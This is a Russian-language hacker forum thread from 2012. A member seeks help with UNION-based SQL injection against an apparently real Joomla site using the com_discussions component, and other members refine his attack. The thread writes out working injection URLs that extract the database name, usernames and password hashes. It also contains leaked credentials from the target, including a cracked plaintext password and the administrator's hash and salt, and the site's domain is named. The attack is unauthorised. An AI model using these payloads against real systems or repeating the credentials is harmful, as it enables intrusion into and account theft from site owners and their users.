 |

20.06.2012, 15:01
|
|
Новичок
Регистрация: 26.01.2012
Сообщений: 4
С нами:
7523606
Репутация:
0
|
|
Вообщем мне требуется помощь. Я немого не допонимаю суть SQL инъекций видимо просто но все же опишу свою проблему и буду рад если кто поможет дельными советами.
Есть пациент:
Сообщение от None
index.php?option=com_discussions&view=thread&catid =14%3Aberserk&thread=1
НАм требуется узнать имя базы данных в которой лежат Логин и пароль администратора делаю это вот так:
Сообщение от None
index.php?option=com_discussions&view=thread&catid =14%3Aberserk&thread=1'%20union%20all%20select%20c oncat(0x7e,0x27,unhex(Hex(cast(database()%20as%20c har))),0x27,0x7e)--+a
Узнаю что название базы данных - ipenza_giperion
Далее вытаскиваем логин администратора следующим образом:
Сообщение от None
index.php?option=com_discussions&view=thread&catid =14%3Aberserk&thread=1'%20union%20all%20select%20( select%20concat(0x7e,0x27,unhex(Hex(cast(jos_users .username%20as%20char))),0x27,0x7e)%20from%20`ipen za_giperion`.jos_users%20Order%20by%20username%20l imit%200,1)%20--+a
Узнаю что он у нас оказывается: Trav
Далее вытаскиваем пасс ( он вроде как должен быть в хэше)
Сообщение от None
/index.php?option=com_discussions&view=thread&catid =14%3Aberserk&thread=1'%20union%20all%20select%20( select%20concat(0x7e,0x27,unhex(Hex(cast(jos_users .password%20as%20char))),0x27,0x7e)%20from%20`ipen za_giperion`.jos_users%20Order%20by%20username%20l imit%200,1)%20--+a#
Наш пароль зашифрован и выглядит вот так: 404d9cea50d28bf697fd5f49fcb12fee:fk2uJkr1H3qsZ4eIP IBYoQ2j4denG7nM
После долгих изучений как расшифровать пароли решил попробывать перебором в пассвордпро .... и о софтинка помогла и разгадала пароль...
Итак что имеем:
Логин Администратора: Trav
Пароль Администратора: 489341282
Заходим в http:///administrator/ вводим то что нашли ....ииииии как нистранно неподходит что то....
Вот где я ошибся ?
|
|
|

20.06.2012, 15:12
|
|
Участник форума
Регистрация: 02.07.2010
Сообщений: 140
С нами:
8348726
Репутация:
0
|
|
Сообщение от Cmexo3aBp
Вообщем мне требуется помощь. Я немого не допонимаю суть SQL инъекций видимо просто но все же опишу свою проблему и буду рад если кто поможет дельными советами.
Есть пациент:
НАм требуется узнать имя базы данных в которой лежат Логин и пароль администратора делаю это вот так:
Узнаю что название базы данных - ipenza_giperion
Далее вытаскиваем логин администратора следующим образом:
Узнаю что он у нас оказывается: Trav
Далее вытаскиваем пасс ( он вроде как должен быть в хэше)
Наш пароль зашифрован и выглядит вот так: 404d9cea50d28bf697fd5f49fcb12fee:fk2uJkr1H3qsZ4eIP IBYoQ2j4denG7nM
После долгих изучений как расшифровать пароли решил попробывать перебором в пассвордпро .... и о софтинка помогла и разгадала пароль...
Итак что имеем:
Логин Администратора: Trav
Пароль Администратора: 489341282
Заходим в http://giperion.pro/administrator/ вводим то что нашли ....ииииии как нистранно неподходит что то....
Вот где я ошибся ?
Где ты умудрился такой пасс раздекодить? oO
|
|
|

20.06.2012, 15:13
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами:
9642449
Репутация:
606
|
|
concat_ws(0x3a,username,password)
вместо отдельных jos_users.password и jos_users.username
|
|
|

20.06.2012, 15:14
|
|
Новичок
Регистрация: 26.01.2012
Сообщений: 4
С нами:
7523606
Репутация:
0
|
|
Ну как то так получилось
|
|
|

20.06.2012, 15:20
|
|
Новичок
Регистрация: 26.01.2012
Сообщений: 4
С нами:
7523606
Репутация:
0
|
|
Сообщение от попугай
concat_ws(0x3a,username,password)
вместо отдельных jos_users.password и jos_users.username
Огромное спасибо оказывается все чуть попроще можно сделать было. Но сути не поменяло это
Сообщение от None
option=com_discussions&view=thread&catid=14%3Abers erk&thread=1'%20union%20all%20select%20(select%20c oncat_ws(0x3a,username,password)%20from%20`ipenza_ giperion`.jos_users%20Order%20by%20username%20limi t%200,1)%20--+a%200,1)%20--+a
Вот запрос который вы предложили.
Получил я на него следующее:
.Trav.:404d9cea50d28bf697fd5f49fcb12fee:fk2uJkr1H3 qsZ4eIPIBYoQ2j4denG7nM
Хэш тот же самый пароль следовательно такой же и все так же он не подходит в админку
Однако доступ на форум я получил. Следовательно я считаю что пароль и логин этот от учетной записи на форуме. Но в упор не понимаю как вытащить пароль и логин от админки.
|
|
|

20.06.2012, 15:26
|
|
Новичок
Регистрация: 26.01.2012
Сообщений: 4
С нами:
7523606
Репутация:
0
|
|
Сообщение от Nightmarе
admin:295cf2af1b061ba92e177c9142b5a158:0Nk1f1OCEPN vSCWl8c9JgQeZSO8Hygty:Super Administrator
Пояснение:
Админа жумлы мы выводим запросом: where usertype='Super Administrator'
а не первого попавшегося лимитом.
Тьфу блин..... Преблагодарен вам очень.
|
|
|

20.06.2012, 15:26
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами:
9642449
Репутация:
606
|
|
Сообщение от Cmexo3aBp
Огромное спасибо
оказывается все чуть попроще можно сделать было. Но сути не поменяло это
Вот запрос который вы предложили.
Получил я на него следующее:
.Trav.:404d9cea50d28bf697fd5f49fcb12fee:fk2uJkr1H3 qsZ4eIPIBYoQ2j4denG7nM
Хэш тот же самый пароль следовательно такой же и все так же он не подходит в админку
Значит это не админский акк. Так как ты упорядочил по username.
20Order%20by%20username
То, вначале тебе вывелся этот юзер с точкой в нике.
Убери упорядочение или выведи непосредственно админов. при помощи
where usertype like '%admin%'
|
|
|

20.06.2012, 15:36
|
|
Новичок
Регистрация: 26.01.2012
Сообщений: 4
С нами:
7523606
Репутация:
0
|
|
http://gyazo.com/66217d4a031316f6ae037bed425ffd56
Вы апсолютно правы. Спасибо огромное за помощь. Подотру урл сайта дабы избежать конфликтов с владельцем.
|
|
|
|
 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|